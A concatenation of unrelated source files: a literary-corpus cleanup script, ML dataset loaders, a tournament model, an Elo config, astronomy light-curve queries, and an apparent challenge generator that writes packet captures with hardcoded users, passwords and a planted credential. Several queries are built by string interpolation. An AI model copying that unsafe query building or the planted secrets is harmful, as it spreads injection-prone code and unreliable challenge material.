header != None:\n\t\t\tfor row in csv_reader:\n\t\t\t\ttitle: str = row[0].replace('\"', '\\\\\"').replace(\"'\", \"\\\\'\")\n\t\t\t\tauthor: str = row[1]\n\n\t\t\t\t# Find all entries with this title and author\n\t\t\t\tdb_cursor.execute(f'SELECT id, filepath FROM work_metadata WHERE title LIKE \"{title}\" AND author LIKE \"{author}\"')\n\t\t\t\tresults: list = db_cursor.fetchall()\n\t\t\t\tkeep: list = []\n\t\t\t\tremove: list = []\n\n\t\t\t\t# Compare the contents of each file to all of the other suspected duplicates\n\t\t\t\tfor res in results:\n\t\t\t\t\tfilepath1: str = f'{base_dir}/{res[1]}'\n\n\t\t\t\t\tfor res2 in results:\n\t\t\t\t\t\tfilepath2 = f'{base_dir}/{res2[1]}'\n\t\t\t\t\t\t\n\t\t\t\t\t\t# Make sure we're not comparing the file to itself before we do the comparison\n\t\t\t\t\t\tif filepath1 != filepath2:\n\t\t\t\t\t\t\t# If the files are exactly equivalent, we can remove one of the duplicate\n\t\t\t\t\t\t\t#\tfiles and database entries\n\t\t\t\t\t\t\tif filecmp.cmp(filepath1, filepath2):\n\t\t\t\t\t\t\t\tlogger.debug(f'{filepath1} and {filepath2} are exactly equivalent.')\n\n\t\t\t\t\t\t\t\tif res not in keep:\n\t\t\t\t\t\t\t\t\tkeep.append(res)\n\n\t\t\t\t\t\t\t\tif res2 not in keep and res2 not in remove:\n\t\t\t\t\t\t\t\t\tremove.append(res2)\n\n\t\t\t\t# Remove all texts in the 'remove' list\n\t\t\t\tfor item in remove:\n\t\t\t\t\tdb_cursor.execute(f'DELETE FROM work_metadata WHERE id = {item[0]}')\n\t\t\t\t\tdb_conn.commit()\n\n\t\t\t\t\tos.remove(f'{base_dir}/{item[1]}')\n\n\t\t\t\t\tequivalent = equivalent + 1\n\n\tprint(f'{equivalent} duplicate files were removed.')\t\t\t\t\t\n\ndef remove_sj_books_and_dicts() -> None:\n\tdb_cursor.execute(\"SELECT id, filepath FROM work_metadata WHERE author LIKE '%Samuel Johnson%' OR author LIKE '%Johnson, Samuel%'\")\n\tbooks_by_sj: list = db_cursor.fetchall()\n\n\tdb_cursor.execute(\"SELECT id, filepath FROM work_metadata WHERE title LIKE '%dictionary%'\")\n\tdict_books: list = db_cursor.fetchall()\n\n\tfor book in books_by_sj:\n\t\tdb_cursor.execute(f\"DELETE FROM work_metadata WHERE id = {book[0]}\")\n\t\tdb_conn.commit()\n\t\tos.remove(f'{base_dir}/{book[1]}')\n\n\tfor book in dict_books:\n\t\tdb_cursor.execute(f\"DELETE FROM work_metadata WHERE id = {book[0]}\")\n\t\tdb_conn.commit()\n\t\tos.remove(f'{base_dir}/{book[1]}')\n\n\tprint(f'Removed {len(books_by_sj) + len(dict_books)} works.')\n\ndef verify_author_publication_dates(browser: webdriver.Chrome, author: str) -> list:\n\tloc_search_page: str = 'https://catalog.loc.gov/vwebv/searchAdvanced'\n\that_search_page: str = 'https://catalog.hathitrust.org/Search/Advanced'\n\tre_date: object = re.compile(r'\\b1([0-9][0-9][0-9])\\b')\n\n\t# Get all Gutenberg texts from the database\n\tdb_cursor.execute(f\"SELECT id, title, filepath FROM work_metadata WHERE author LIKE {author}\")\n\ttexts: list = db_cursor.fetchall()\n\n\tin_range_count: int = 0\n\ttexts_no_result: int = 0\n\ttexts_removed: int = 0\n\t\n\t# Search the HathiTrust catalog for each text. If no results were found, \n\t#\tdo another search on Library of Congress\n\tfor i, text in enumerate(texts):\n\t\ttext_id: int = text[0]\n\t\ttext_title: str = text[1]\n\t\ttext_filepath: str = text[2]\n\n\t\ttime.sleep(2)\n\n\t\t# Each search needs to begin on a fresh search page\n\t\tbrowser.get(hat_search_page)\n\n\t\t# Wait until the text boxes show up before trying to enter the title/author\n\t\tsearch_box: EC.presence_of_element_located = EC.presence_of_element_located((By.ID, 'field-search-text-input-1'))\n\t\tWebDriverWait(browser, 5).until(search_box)\n\n\t\t# Enter title and author into text boxes and select the corresponding\n\t\t#\toptions in the dropdowns to specify where to search in\n\t\tbrowser.find_element_by_id('field-search-text-input-1').send_keys(text_title)\n\t\tbrowser.find_element_by_id('field-search-text-input-2').send_keys(author)\n\n\t\tdropdown_title: Select = Select(browser.find_element_by_xpath('//*[@id=\"section\"]/form/fieldset[1]/div/select'))\n\t\tdropdown_title.select_by_value('title')\n\n\t\tdropdown_author: Select = Select(browser.find_element_by_xpath('//*[@id=\"section\"]/form/fieldset[2]/div/select'))\n\t\tdropdown_author.select_by_value('author')\n\n\t\t# Selecting the 'OR' radio button seems to yield better results\n\t\t#browser.find_element_by_xpath('//*[@id=\"section\"]/form/fieldset[2]/fieldset/div[2]/label').click()\n\n\t\tbrowser.find_element_by_class_name('button.btn.btn-primary').click()\n\n\t\t# Wait for the page to load before grabbing the HTML\n\t\tresults_intro: EC.presence_of_element_located = EC.presence_of_element_located((By.CLASS_NAME, 'listcs-intro'))\n\t\tWebDriverWait(browser, 5).until(results_intro)\n\n\t\tsoup: BeautifulSoup = BeautifulSoup(browser.page_source, 'lxml')\n\n\t\t# Check if no results were found\n\t\tresult_desc: bs4.element.Tag = soup.find('h2', class_='results-summary')\n\n\t\tif result_desc != None:\n\t\t\t# If no results on HathiTrust, need to search on LOC\n\t\t\tif 'No results matched your search' not in result_desc.text:\n\t\t\t\tlist_term: bs4.element.ResultSet = soup.find('dt')\n\t\t\t\tlist_desc: bs4.element.ResultSet = soup.find('dd')\n\t\t\t\tpub_date: int = 0\n\n\t\t\t\t# Sometimes a publication date isn't listed, so instead of trying\n\t\t\t\t#\tto access it directly we need to look for it. If there isn't one,\n\t\t\t\t#\tthen pub_date will remain 0 and we will count this text as within\n\t\t\t\t#\trange to be on the safe side.\n\t\t\t\tif 'Published' in list_term.text:\n\t\t\t\t\tpub_date = int(list_desc.text)\n\n\t\t\t\t# Remove all texts published outside our cutoff date\n\t\t\t\tif pub_date > 1755:\n\t\t\t\t\tdb_cursor.execute(f'DELETE FROM work_metadata WHERE id = {text_id}')\n\t\t\t\t\tdb_conn.commit()\n\t\t\t\t\tos.remove(f'{base_dir}/{text_filepath}')\n\n\t\t\t\t\ttexts_removed = texts_removed + 1\n\t\t\telse:\n\t\t\t\ttexts_no_result = texts_no_result + 1\n\n\t# print(f'Out of {len(gut_texts)} texts, {in_range_count} were in the date range.')\n\n\treturn [texts_no_result, texts_removed]\n\ndef verify_author_birthdates() -> None:\n\tre_date: object = re.compile(r'\\b1([0-9][0-9][0-9])\\b')\n\tget_author_query: str = \"\"\"SELECT author, count(author) FROM work_metadata\n\t\t\t\t\t\t\t   WHERE filepath LIKE '%gut_texts%'\n\t\t\t\t\t\t\t   OR filepath LIKE '%lib_texts%'\n\t\t\t\t\t\t\t   GROUP BY author \n\t\t\t\t\t\t\t   ORDER BY count(author) DESC\"\"\"\n\n\tdb_cursor.execute(get_author_query)\n\tauthor_list: list = db_cursor.fetchall()\n\n\tauthor_no_result: int = 0\n\n\t# Set up a headless Chrome instance to be used when no result is returned\n\t#\tfrom Wikidata\n\tchromeopts: Options = Options()\n\tchromeopts.headless = True\n\tchromeopts.add_argument('window-size=1920x1080')\n\tbrowser: webdriver.Chrome = Chrome(options=chromeopts)\n\n\tdef run_wiki_query(qauthor: str) -> int:\n\t\tprint(f'Running query on `{qauthor}`')\n\t\tendpoint_url: str = \"https://query.wikidata.org/sparql\"\n\t\tuser_agent: str = \"WDQS-example Python/%s.%s\" % (sys.version_info[0], sys.version_info[1])\n\n\t\tquery_string: str = \"\"\"\n\t\tSELECT distinct ?item ?itemLabel ?itemDescription (SAMPLE(?DR) as ?DR) (SAMPLE(?RIP) as ?RIP) (SAMPLE(?image)as ?image) (SAMPLE(?article)as ?article) WHERE {\n\t\t  ?item wdt:P31 wd:Q5.\n\t\t  ?item ?label \"%s\"@en. \n\t\t  ?article schema:about ?item .\n\t\t  ?article schema:inLanguage \"en\" .\n\t\t  ?article schema:isPartOf <https://en.wikipedia.org/> . \n\t\t  OPTIONAL{?item wdt:P569 ?DR .}       # P569 : Date of birth\n\t\t  OPTIONAL{?item wdt:P570 ?RIP .}      # P570 : Date of death\n\t\t\t\n\t\t  SERVICE wikibase:label { bd:serviceParam wikibase:language \"en\". } \n\t\t}\n\t\tGROUP BY ?item ?itemLabel ?itemDescription\n\t\t\"\"\"\n\n\t\tsparql: SPARQLWrapper = SPARQLWrapper(endpoint_url, agent=user_agent)\n\t\tsparql.setQuery(query_string % qauthor)\n\t\tsparql.setReturnFormat(JSON)\n\n\t\twiki_search_res: object = sparql.query().convert()\n\n\t\tearliest_date: int = 2100\n\n\t\tfor row in wiki_search_res['results']['bindings']:\n\t\t\ttry:\n\t\t\t\tdate: object = re_date.match(row['DR']['value'])\n\t\t\texcept Exception as e:\n\t\t\t\tdate: object = re_date.match('2100')\n\n\t\t\tif date:\n\t\t\t\tint_date: int = int(date[0])\n\n\t\t\t\tif int_date < earliest_date:\n\t\t\t\t\tearliest_date = int_date\n\n\t\treturn earliest_date\n\n\ttotal_removal_candidates: int = 0\n\tcross_ref_removals: int = 0\n\tcross_ref_no_results: int = 0\n\n\tfor result in author_list:\n\t\tauthor: str = result[0]\n\n\t\t# Some names with abbreviations in them are not spaced correctly,\n\t\t#\twhich causes them to not return a result from Wikidata.\n\t\t#\tThis regex will fix that; for example, 'H.G. Wells'\n\t\t#\twill become 'H. G. Wells'\n\t\tauthor = re.sub(r'\\.(?! )', '. ', author)\n\n\t\t# Similarly, some authors have quotes in them, like ones that\n\t\t#\thave a nickname along with their real name. Attempting\n\t\t#\tto pass that to SPARQL will throw an exception because of how\n\t\t#\tour query is formatted, so here we simply escape all \" instances\n\t\tauthor = author.replace('\"', r'\\\"')\n\n\t\torig_author: str = author\n\n\t\t# Skip over 'fake' authors, like 'Various' and such\n\t\tif not (author == 'Various' or author == 'Unknown' or author == 'Anonymous' or 'Editor' in author):\n\t\t\t# Check if there is a second name in parentheses, and if so\n\t\t\t#\tget the name not in parentheses\n\t\t\tif '(' in author:\n\t\t\t\ttokens: list = author.split('(')\n\t\t\t\tauthor = tokens[0]\n\t\t\t\tauthor2 = tokens[1][:-1]\n\n\t\t\tbirth_date: int = run_wiki_query(author.strip())\n\n\t\t\tif birth_date == 2100:\n\t\t\t\tauthor_no_result = author_no_result + 1\n\n\t\t\t\ttry:\n\t\t\t\t\tpub_date_result: list = verify_author_publication_dates(browser, author)\n\t\t\t\t\ttotal_removal_candidates = total_removal_candidates + pub_date_result[1]\n\t\t\t\t\tcross_ref_removals = cross_ref_removals + pub_date_result[1]\n\t\t\t\t\tcross_ref_no_results = cross_ref_no_results + pub_date_result[0]\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tpass\t\t\t\t\n\n\t\t\telif birth_date > 1755:\n\t\t\t\tprint(f'Author {author} born after 1755, removing {result[1]} texts.')\n\t\t\t\ttotal_removal_candidates = total_removal_candidates + result[1]\n\n\t\t\t\tdb_cursor.execute(f'SELECT id, filepath FROM work_metadata WHERE author LIKE \"{orig_author}\"')\n\t\t\t\ttexts: list = db_cursor.fetchall()\n\n\t\t\t\tfor entry in texts:\n\t\t\t\t\tdb_cursor.execute(f'DELETE FROM work_metadata WHERE id = {entry[0]}')\n\t\t\t\t\tdb_conn.commit()\n\t\t\t\t\tos.remove(f'{base_dir}/{entry[1]}')\n\n\tprint(f'{total_removal_candidates} texts were removed. Of the {author_no_result} authors that returned no result, {cross_ref_removals} of their texts were removed and {cross_ref_no_results} of their texts could not be found.')\n\n\tbrowser.close()\n\n\t# result = return_sparql_query_results(query_string % author)\n\t# for row in result['results']['bindings']:\n\t# \tprint(row['DR']['value'])\n\nverify_author_birthdates()\n\ndb_conn.close()\n","repo_name":"CHDRucf/SJD-Quotes-Processor","sub_path":"scraper/reduce_corpora.py","file_name":"reduce_corpora.py","file_ext":"py","file_size_in_byte":16422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
self.get_full_interacting_dim_list(dim)\n kernel_list = [deepcopy(kernel) for i in range(len(interacting_dims))]\n for i in range(len(kernel_list)):\n kernel_list[i].set_dim(len(interacting_dims[i]))\n super().__init__(kernel_list, interacting_dims)\n\n @staticmethod\n def get_full_interacting_dim_list(dim):\n s = [i for i in range(dim)]\n iter_object = chain.from_iterable(combinations(s, r) for r in range(1, len(s)+1))\n return [list(i) for i in list(iter_object)]","repo_name":"MatthewAlexanderFisher/GaussED","sub_path":"src/gaussed/kernel/anova.py","file_name":"anova.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"71291521757","text":"from enum import auto\nfrom typing import Literal\n\nfrom heliclockter import datetime_utc\n\nfrom bracket.models.db.shared import BaseModelORM\nfrom bracket.utils.types import EnumAutoStr\n\n\nclass StageType(EnumAutoStr):\n DOUBLE_ELIMINATION = auto()\n ROUND_ROBIN = auto()\n SINGLE_ELIMINATION = auto()\n SWISS = auto()\n SWISS_DYNAMIC_TEAMS = auto()\n\n\nclass Stage(BaseModelORM):\n id: int | None = None\n tournament_id: int\n created: datetime_utc\n type: StageType\n is_active: bool\n\n\nclass StageUpdateBody(BaseModelORM):\n is_active: bool\n\n\nclass StageActivateBody(BaseModelORM):\n direction: Literal['next', 'previous'] = 'next'\n\n\nclass StageCreateBody(BaseModelORM):\n type: StageType\n","repo_name":"evroon/bracket","sub_path":"backend/bracket/models/db/stage.py","file_name":"stage.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"51"} +{"seq_id":"20400705760","text":"# parameters for the Elo algorithm -- setting kind of arbitrarily for now, should tune once we have more data\nDEFAULT_K_VALUE = 80\nDEFAULT_D_VALUE = 600\nDEFAULT_SCORING_FUNCTION_BASE = 1.0\nINITIAL_RATING = 1000\n\n# Google Sheets info for reading input data\nGSHEETS_CREDENTIALS_FILE = \"./google-credentials.json\"\nSPREADSHEET_ID = \"17em2c8aP1zPWXQSSEDTYau8yRhKCvKfvzWnyv1LEsys\"\nDATA_SHEET_ID = 302447166\nDUMMY_PLAYER_NAME = \"_dummy_\"\n\n# dashboard settings\nDBC_THEME = \"FLATLY\" # others I liked: DARKLY, SIMPLEX, LUMEN (https://bootswatch.com/flatly/)\nPLOTLY_THEME = \"plotly_white\"\nLOGO_PATH = \"/assets/tbycsprints.png\"\nGITHUB_LOGO_PATH = \"assets/GitHub-Mark-32px.png\"\nGITHUB_URL = \"https://github.com/alexpersin/tbyc-elo\"\nTITLE = \"TBYC Sprint 15 Rankings\"\nSUBTITLE = \"Home of Uncommonly Smooth Sailing\"\n","repo_name":"alexpersin/tbyc-elo","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"51"} +{"seq_id":"74549242718","text":"import os\n\nimport numpy as np\nimport torch\nfrom torch.utils.data import DataLoader, Dataset\nfrom PIL import Image\nfrom torchvision import transforms\nfrom torchvision.transforms import functional as Ft\nimport matplotlib.pyplot as plt\n\nfrom preprocessing import custom_transforms as tr\n\n\n# 接下来,对标签图片进行处理,将其转换为对应的标签矩阵。先列出标签中每个RGB的值及其对应类别,一共21类:\nclasses = ['background',\n 'aeroplane',\n 'bicycle',\n 'bird',\n 'boat',\n 'bottle',\n 'bus',\n 'car',\n 'cat',\n 'chair',\n 'cow',\n 'diningtable',\n 'dog',\n 'horse',\n 'motorbike',\n 'person',\n 'potted plant',\n 'sheep',\n 'sofa',\n 'train',\n 'tv/monitor']\n\n# RGB color for each class\ncolormap = [[0, 0, 0], [128, 0, 0], [0, 128, 0], [128, 128, 0], [0, 0, 128],\n [128, 
0, 128], [0, 128, 128], [128, 128, 128], [64, 0, 0], [192, 0, 0],\n [64, 128, 0], [192, 128, 0], [64, 0, 128], [192, 0, 128],\n [64, 128, 128], [192, 128, 128], [0, 64, 0], [128, 64, 0],\n [0, 192, 0], [128, 192, 0], [0, 64, 128]]\ncolormap = np.asarray(colormap)\ncm2lbl = np.zeros(256 ** 3)\n\n# 建立一个索引,将标签图片中每个像素的RGB值一对一映射到对应的类别索引:\nfor i, cm in enumerate(colormap):\n cm2lbl[(cm[0] * 256 + cm[1]) * 256 + cm[2]] = i\n\n\ndef image2label(im):\n data = np.array(im, dtype='int32')\n idx = (data[:, :, 0] * 256 + data[:, :, 1]) * 256 + data[:, :, 2]\n return np.array(cm2lbl[idx], dtype='int64')\n\n\n\n\n\n\n\n\n\nclass VOCSegmentation(Dataset):\n \"\"\"\n\n 最后,通过torch.utls.data.Dataset自定义数据集类,\n 通过._getitem__函数,访问数据集中索引为idx 的输入图像及其对应的标签矩阵。\n 由于数据集中有些图像的尺寸可能小于随机裁剪所指定的输出尺寸,这些样本需要通过自定义的fiter 函数所移除。\n 此外,还对输入图像的RGB三个通道的值分别做标准化。\n\n \"\"\"\n\n def __init__(self, config, split='train' ):\n \"\"\"\n :param voc_root: 放置数据集的位置\n :param year: 年份,我这里只放置了2012年的\n :param transforms: 是否对图片进行裁剪,transforms =None不进行裁剪\n :param txt_name:\n \"\"\"\n\n super(VOCSegmentation, self).__init__()\n self.config = config\n self.split = split\n self.num_classes = self.num_classes = self.config['network']['num_classes']\n root = os.path.join(config['dataset']['base_path'], \"VOCdevkit\", f\"VOC2010\")\n # 拼接字符串\n assert os.path.exists(root), \"path '{}' does not exist.\".format(root)\n image_dir = os.path.join(root, 'JPEGImages')\n # 掩膜的路径位置,就是分割好的图片\n mask_dir = os.path.join(root, 'SegmentationClass')\n #\n txt_path = ''\n if split=='train':\n txt_path = os.path.join(root, \"ImageSets\", \"Segmentation\", \"train.txt\")\n if split=='val':\n txt_path = os.path.join(root, \"ImageSets\", \"Segmentation\", \"val.txt\")\n\n assert os.path.exists(txt_path), \"file '{}' does not exist.\".format(txt_path)\n\n with open(os.path.join(txt_path), \"r\") as f:\n file_names = [x.strip() for x in f.readlines() if len(x.strip()) > 0]\n\n # 根据Segmentation 文件夹下所以提供的train.txt,来进行图片的加载\n self.images = [os.path.join(image_dir, x + \".jpg\") for x in file_names]\n # 掩膜图片位置\n self.masks = [os.path.join(mask_dir, x + \".png\") for x in file_names]\n assert (len(self.images) == len(self.masks))\n\n\n\n\n def __getitem__(self, index):\n _img, _target, _h, _w = self._make_img_gt_point_pair(index)\n # print(_img.size)\n\n # seg_labels = np.eye(self.num_classes)[_target.reshape([-1])]\n #\n # seg_labels = seg_labels.reshape((int(_img[0]), int(_img[1]), self.num_classes))\n\n\n # sample = {'image': _img, 'label': _target, 'seg_labels': seg_labels}\n sample = {'image': _img, 'label': _target}\n\n\n\n if self.split == \"train\":\n # print('train')\n traindata = self.transform_tr(sample)\n\n # print(type(traindata))\n\n # target_tensor = traindata['label']\n # # print(type(target_tensor), target_tensor.shape)\n #\n # target_numpy = target_tensor.numpy().astype(np.uint8)\n # #print(np.unique(target_numpy))\n # print(target_tensor.shape,traindata['image'].shape)\n # print(target_numpy.reshape([-1]).shape)\n # target_numpy_ = np.eye(self.num_classes + 1)[target_numpy.reshape([-1])]\n # target_numpy_ = target_numpy_.reshape(target_tensor.shape[0], target_tensor.shape[1], self.num_classes + 1)\n #\n # seg_labels = np.array(target_numpy_).astype(np.float32)\n # seg_labels = torch.from_numpy(seg_labels).float()\n seg_labels = []\n traindata['seg_labels'] = seg_labels\n\n return traindata\n elif self.split == 'val':\n # print('val')\n valdata = self.transform_val(sample)\n #target_tensor = valdata['label']\n # target_numpy = 
            # target_tensor = traindata['label']\n            # # print(type(target_tensor), target_tensor.shape)\n            #\n            # target_numpy = target_tensor.numpy().astype(np.uint8)\n            # #print(np.unique(target_numpy))\n            # print(target_tensor.shape,traindata['image'].shape)\n            # print(target_numpy.reshape([-1]).shape)\n            # target_numpy_ = np.eye(self.num_classes + 1)[target_numpy.reshape([-1])]\n            # target_numpy_ = target_numpy_.reshape(target_tensor.shape[0], target_tensor.shape[1], self.num_classes + 1)\n            #\n            # seg_labels = np.array(target_numpy_).astype(np.float32)\n            # seg_labels = torch.from_numpy(seg_labels).float()\n            seg_labels = []\n            traindata['seg_labels'] = seg_labels\n\n            return traindata\n        elif self.split == 'val':\n            # print('val')\n            valdata = self.transform_val(sample)\n            #target_tensor = valdata['label']\n            # target_numpy = target_tensor.numpy().astype(np.uint8)\n            # target_numpy_ = np.eye(self.num_classes + 1)[target_numpy.reshape([-1])]\n            # target_numpy_ = target_numpy_.reshape(target_tensor.shape[0], target_tensor.shape[1], self.num_classes + 1)\n            target_numpy_ = [] # one-hot encoding left empty here\n\n            valdata['seg_labels'] = target_numpy_\n            return valdata\n        elif self.split == 'test':\n            # print('in return')\n            #return self.transform_val(sample)\n            valdata = self.transform_val(sample)\n            # target_tensor = valdata['label']\n            # target_numpy = target_tensor.numpy().astype(np.uint8)\n            # target_numpy_ = np.eye(self.num_classes + 1)[target_numpy.reshape([-1])]\n            # target_numpy_ = target_numpy_.reshape(target_tensor.shape[0], target_tensor.shape[1], self.num_classes + 1)\n            target_numpy_ = []\n            valdata['seg_labels'] = target_numpy_\n            # valdata['name'] = str(self.images[index]).split('\\\\')[3].split('.')[0]\n            # valdata['h'] = _h\n            # valdata['w'] = _w\n            return valdata\n\n    def _make_img_gt_point_pair(self, index):\n        _img = Image.open(self.images[index]).convert('RGB')\n        _target = Image.open(self.masks[index])\n        _h = _img.size[1]\n        _w = _img.size[0]\n        return _img, _target, _h, _w\n\n    def transform_tr(self, sample):\n        composed_transforms = transforms.Compose([\n            tr.RandomHorizontalFlip(),\n            tr.RandomScaleCrop(base_size=self.config['image']['base_size'],\n                               crop_size=self.config['image']['crop_size']),\n            tr.RandomGaussianBlur(),\n            tr.Normalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225)),\n            tr.ToTensor()])\n\n        return composed_transforms(sample)\n\n    def transform_val(self, sample):\n\n        composed_transforms = transforms.Compose([\n            # tr.FixScaleCrop(crop_size=crop_size),\n            tr.FixScaleCrop(crop_size=self.config['image']['crop_size']),\n            # tr.FixScaleCrop(crop_size=513),\n            tr.Normalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225)),\n            tr.ToTensor()])\n\n        return composed_transforms(sample)\n\n    @staticmethod\n    def preprocess(sample, crop_size=513):\n\n        composed_transforms = transforms.Compose([\n            tr.FixScaleCrop(crop_size=crop_size),\n            tr.Normalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225)),\n            tr.ToTensor()])\n\n        return composed_transforms(sample)\n\n    # written by gc: preprocessing without cropping\n    @staticmethod\n    def preprocess_no_crop(sample):\n\n        composed_transforms = transforms.Compose([\n            # tr.FixScaleCrop(crop_size=crop_size),\n            tr.Normalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225)),\n            tr.ToTensor()\n        ])\n\n        return composed_transforms(sample)\n\n    def __str__(self):\n        return 'VOCSegmentation(split=' + str(self.split) + ')'\n\n    def __len__(self):\n        return len(self.images)\n\n\n\n\nif __name__ == '__main__':\n    import yaml\n    #path = '../configs/seg_hrnet_ocr_w48_cls59_520x520_sgd_lr1e-3_wd1e-4_bs_16_epoch200.yaml'\n    #path = '../configs/config_hrnet_ocr.yml'\n    path = '../configs/config_hrnet_ocr.yml'\n    with open(path) as f:\n        config = yaml.load(f, Loader=yaml.FullLoader)\n    #print(config)\n    dataset = VOCSegmentation(config,split='train')\n    data = DataLoader(dataset,4,shuffle=True)\n    #print(dataset.__len__())\n    #print(len(data))\n\n    for i, sample in enumerate(data):\n        #print(sample)\n\n\n        print(sample['label'].shape)\n        if i>5:\n            break\n\n\n
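# The commented-out block below is an earlier standalone variant: a\n# get_dataloader factory plus matplotlib helpers for showing images and\n# colour-mapped label masks.\n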
# def get_dataloader(mode=True, batch_size=4, shape=(512, 512)):\n#     \"\"\"\n#     Build and return the dataset loader\n#     :param mode:\n#     :return:\n#     \"\"\"\n#     if mode:\n#         # 2. Instantiate and prepare the dataloader\n#         dataset = VOCSegmentation(voc_root=r\"E:\\note\\cv\\data\\VOC_Train\",\n#                                   shape=shape,\n#                                   )\n#         dataloader = DataLoader(dataset=dataset, batch_size=batch_size, shuffle=True)\n#     else:\n#         dataset = VOCSegmentation(voc_root=r\"E:\\note\\cv\\data\\VOC_Train\",\n#                                   shape=shape,\n#                                   txt_name=\"val.txt\",\n#                                   )\n#         dataloader = DataLoader(dataset=dataset, batch_size=batch_size, shuffle=True)\n#     return dataloader\n#\n#\n# cm = np.array(colormap).astype('uint8')\n#\n#\n# def show_image(tensor):\n#     plt.figure()\n#     image = tensor.numpy().transpose(1, 2, 0)\n#     plt.imshow(image)\n#     plt.show()\n#\n#\n# def show_label(label):\n#     print(label.shape)\n#     plt.figure()\n#     labels = cm[label]\n#     plt.imshow(labels)\n#     plt.show()\n#\n#\n# def show_label_2(label):\n#     plt.figure()\n#     # print(np.unique(label.numpy()))\n#     label = label.numpy().astype('uint8')\n#     label[label == 255] = 0\n#     label = colormap[label]\n#     print(label.shape)\n#     plt.imshow(label)\n#     plt.show()\n#\n#\n# if __name__ == '__main__':\n#     train_dataloader = get_dataloader(True, batch_size=2)\n#\n#     for images, labels in train_dataloader:\n#         show_image(images[0])\n#         show_label_2(labels[0])\n#         break\n\n","repo_name":"ZhongHHX/FMNet","sub_path":"data_generators/voc2012.py","file_name":"voc2012.py","file_ext":"py","file_size_in_byte":10753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
{"seq_id":"20824980636","text":"#!/usr/bin/env python3\nfrom progressbar import progressbar\nimport random\nimport rsa\nimport secrets\nimport struct\n\nfrom scapy.all import wrpcap\n\nfrom AuthServer import AuthServer\nfrom Device import Device\nfrom SecureTransport import SecureTransport, xor\nfrom TCPStream import TCPStream\nfrom TCPStreamTransport import TCPStreamTransport\nfrom Token import generate_token\n\nusers = \"\"\"yen\nbarney\ndion\nsavanna\nbritt\nangelina\nranae\nargelia\nyesenia\nmark\njone\njosue\nsharri\njohnny\ncristi\nscott\nfausto\nyasmine\nscarlett\nmyesha\nlona\nronald\nkatheleen\naudrea\nrobert\neloy\nayana\nmolly\nneal\nedith\"\"\"\n\npasswords = \"\"\"DyUhEFCAKz9NBsMn\nupJHwzmFyBR2NwDd\nKvb9JcWnPntUv5vW\ncmN6GpNe7yajpWKE\n3V3P9FDEQA35Zuzk\nMc7uZjHUyZFFE257\nLN7MJzDqzXJzHJj2\nQhrx8RaxZr7uk68P\n2fWMZp8L7p8P287t\nprxuys3J8BKxhwAa\nYkLR87KZxRgfSgL7\nNSEppWcrgKkRWfNP\nAFQpcJuUmnspBBrx\nEQYB9Hzauup5ZtNE\ncDgmhFxkNQAuWm3a\nMRKyEddteDTesaz9\nKVpR5hsvuSTSj2tq\ndzheJgptdeHmP7Yb\nqFJke4UZpmaSaLz5\nkMv3h5pEzXAYykpD\nLLGLRPLpREsbVD28\nGGS8vM5VMxa4zArD\nr5DuCDBbC7GUpuGm\nZJ77bbVQX8XjYpSz\nkVGVkukgjufKKJ53\nGhzRYvhh9de4vpyQ\nez89Ge2BtatHCjUL\nAfZBdrGXqEBq7v6R\ncgBudzMNUuJj9UZb\nbEGyseZHm5L9YwAj\"\"\"\n\nusers = users.split(\"\\n\")\npasswords = passwords.split(\"\\n\")\n\nclients = []\n\nfor c in range(1, 5):\n    for d in range(1, 255):\n        clients.append((c, d))\n\nrandom.shuffle(clients)\n\nwith open(\"sign_key.pem\", \"rb\") as f:\n    token_sign_key = rsa.PrivateKey.load_pkcs1(f.read())\n\nserver_device = Device(\"10.0.0.1\")\nkey = secrets.token_bytes(AuthServer.MAX_MESSAGE)\npackets = []\n\nfor client in progressbar(clients):\n    address = \"10.0.%d.%d\" % (client[0], client[1])\n    client_secret = client[1]\n    client_device = Device(address)\n    client_key = xor(key, bytes([client_secret]))\n\n    if clients.index(client) == 784:\n        user = \"alexander\"\n        password = \"UH3nSzXRd9MHrxp5\"\n    else:\n        user = random.choice(users)\n        password = passwords[users.index(user)]\n\n    stream = TCPStream(client_device, server_device, 3000)\n    stream.handshake()\n    stream.server_send(struct.pack(\" Select:\n        \"\"\"\n        Gets the 
SQL query for the database models for the light curve collection.\n\n        :return: The SQL query.\n        \"\"\"\n        query = super().get_sql_query()\n        eclipsing_binary_tic_id_query = TessEclipsingBinaryMetadata.select(TessEclipsingBinaryMetadata.tic_id)\n        query = query.where(TessFfiLightCurveMetadata.tic_id.in_(eclipsing_binary_tic_id_query))\n        return query\n\n\nclass TessFfiAntiEclipsingBinaryForTransitLightCurveCollection(TessFfiLightCurveCollection):\n    \"\"\"\n    A class representing the collection of TESS FFI light curves flagged as eclipsing binaries that are\n    not suspected transits.\n    \"\"\"\n    def __init__(self, dataset_splits: Union[List[int], None] = None,\n                 magnitude_range: (Union[float, None], Union[float, None]) = (None, None)):\n        super().__init__(dataset_splits=dataset_splits, magnitude_range=magnitude_range)\n        self.label = 0\n\n    def get_sql_query(self) -> Select:\n        \"\"\"\n        Gets the SQL query for the database models for the light curve collection.\n\n        :return: The SQL query.\n        \"\"\"\n        query = super().get_sql_query()\n        transit_tic_id_query = TessTransitMetadata.select(TessTransitMetadata.tic_id).where(\n            (TessTransitMetadata.disposition == TransitDisposition.CONFIRMED.value) |\n            (TessTransitMetadata.disposition == TransitDisposition.CANDIDATE.value))\n        eclipsing_binary_tic_id_query = TessEclipsingBinaryMetadata.select(TessEclipsingBinaryMetadata.tic_id).where(\n            TessEclipsingBinaryMetadata.tic_id.not_in(transit_tic_id_query))\n        query = query.where(TessFfiLightCurveMetadata.tic_id.in_(eclipsing_binary_tic_id_query))\n        return 